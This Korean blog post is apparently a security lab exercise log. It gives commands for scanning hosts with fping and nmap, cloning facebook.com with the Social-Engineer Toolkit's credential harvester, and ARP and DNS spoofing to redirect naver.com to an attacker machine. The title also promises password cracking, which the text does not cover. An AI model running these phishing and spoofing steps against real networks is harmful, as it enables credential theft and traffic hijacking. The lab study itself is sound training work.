본문 바로가기
보안

[보안 실습] 정보 수집, 사이트 복제, 패스워드 크래킹

by z.1nee 2021. 2. 15.
SMALL

정보 수집 실습

칼리 터미널 열기 > fping -g 192.168.10.0/24

192.168.10.0 내에서 활성화된 시스템을 확인해 공격대상 식별

 

 

칼리 터미널 > nmap -O 192.168.10.30

특정 호스트 192.168.10.30의 운영체제 확인

 

 

 

사이트 복제 실습

1. kali 터미널 열기 > service apach2 start

2. client에서 주소창에 192.168.10.50(칼리 ip)

3. kali 터미널 열기 > setoolkit > 1) Socisl-Engineering Attacks > 2) Web Attack Vector > 3) Credential Harvest Attack Method > 2) Site Cloner 

4. 공격자 IP 주소 입력 : 192.168.10.50

복제할 사이트 : www.facebook.com  

5. 클라이언트에서 http://192.168.10.50 확인

6. 칼리에서 터미널 열기 > cat /var/www/html/index.html (사이트가 복제되었는지 확인)

 

 

 

 

ARP Spoofing & DNS Spoofing를 이용한 Pharming

클라이언트 명령 프롬프트 > nslookup www.naver.com

 

칼리 터미널에서 ifconfig

 

 

arpspoof 서비스를 이용해서 ARP Spoofing 수행

arpspoof -i eth0 -t 192.168.10.40 192.168.10.2
//arpspoof -i 인터페이스 -t 희생자IP 게이트웨이IP

 

 

DNS 테이블 생성

칼리 터미널

cd /
vi dns
192.168.10.50 www.naver.com

 

 

 

Client에서 www.naver.com 의 IP주소 확인

nslookup www.naver.com

192.168.10.50으로 변경된걸 볼 수 있음

댓글